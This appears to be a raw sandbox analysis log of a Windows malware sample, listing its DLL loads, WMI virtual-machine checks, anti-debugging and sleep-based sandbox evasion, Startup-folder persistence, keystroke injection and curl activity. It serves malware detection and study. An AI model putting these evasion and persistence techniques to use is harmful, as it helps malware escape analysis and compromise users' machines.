Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll

Source: C:\Windows\SysWOW64\systeminfo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\SysWOW64\curl.exe

File written: C:\Users\user\AppData\Local\Temp\tmp.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001E42DE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00200A76 push ecx; ret		0_2_00200A89
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00560A76 push ecx; ret		20_2_00560A89

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_001FF98E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00271C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00271C41
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0055F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	20_2_0055F98E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	20_2_005D1C41

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\file.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-95960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 6530			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Window / User API: threadDelayed 5498			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	API coverage: 4.2 %
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	API coverage: 4.1 %

Source: C:\Users\user\Desktop\file.exe TID: 4332	Thread sleep time: -65300s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe TID: 3568	Thread sleep count: 5498 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe TID: 3568	Thread sleep time: -54980s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\file.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Thread sleep count: Count: 6530 delay: -10			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Thread sleep count: Count: 5498 delay: -10			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0024D3A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0024DBBE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0021C2A2 FindFirstFileExW,	0_2_0021C2A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002568EE FindFirstFileW,FindClose,	0_2_002568EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0025698F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0024D076
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00259642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00259642
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0025979D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00259B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00259B2B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00255C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00255C97
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_005AD3A9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	20_2_005ADBBE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0057C2A2 FindFirstFileExW,	20_2_0057C2A2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B68EE FindFirstFileW,FindClose,	20_2_005B68EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	20_2_005B698F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_005AD076
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_005B9642
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_005B979D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	20_2_005B9B2B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B5C97 FindFirstFileW,FindNextFileW,FindClose,	20_2_005B5C97

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001E42DE

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: curl.exe, 0000000C.00000003.2275643983.00000000032F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: curl.exe, 00000009.00000003.2241791750.0000000003060000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2244193304.0000000003063000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: curl.exe, 00000007.00000003.2207063543.0000000003089000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.2209366991.0000000003089000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.2205956694.00000000030CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.2206873585.0000000003088000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.2205956694.00000000030C7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2403837069.00000000030EF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2403483111.0000000003124000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2403483111.000000000312B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2403796126.00000000030EA000.00000004.00000020.00020000.00000000.sdmp, tmp.txt.1.dr	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: curl.exe, 00000007.00000003.2207063543.0000000003080000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.2300660489.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2403796126.00000000030E1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001B.00000003.2428836620.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000003.2454053246.0000000003741000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000003.2481341796.0000000003321000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0025EAA2 BlockInput,

0_2_0025EAA2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00212622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00212622

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001E42DE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00204CE8 mov eax, dword ptr fs:[00000030h]		0_2_00204CE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00564CE8 mov eax, dword ptr fs:[00000030h]		20_2_00564CE8

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00240B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00240B62

Source: C:\Windows\SysWOW64\tasklist.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00212622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00212622
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0020083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0020083F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002009D5 SetUnhandledExceptionFilter,	0_2_002009D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00200C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00200C21
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00572622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_00572622
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0056083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_0056083F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005609D5 SetUnhandledExceptionFilter,	20_2_005609D5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_00560C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_00560C21

Source: C:\Users\user\Desktop\file.exe

0_2_00241201

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00222BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00222BA5

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0024B226 SendInput,keybd_event,

0_2_0024B226

Source: C:\Users\user\Desktop\file.exe

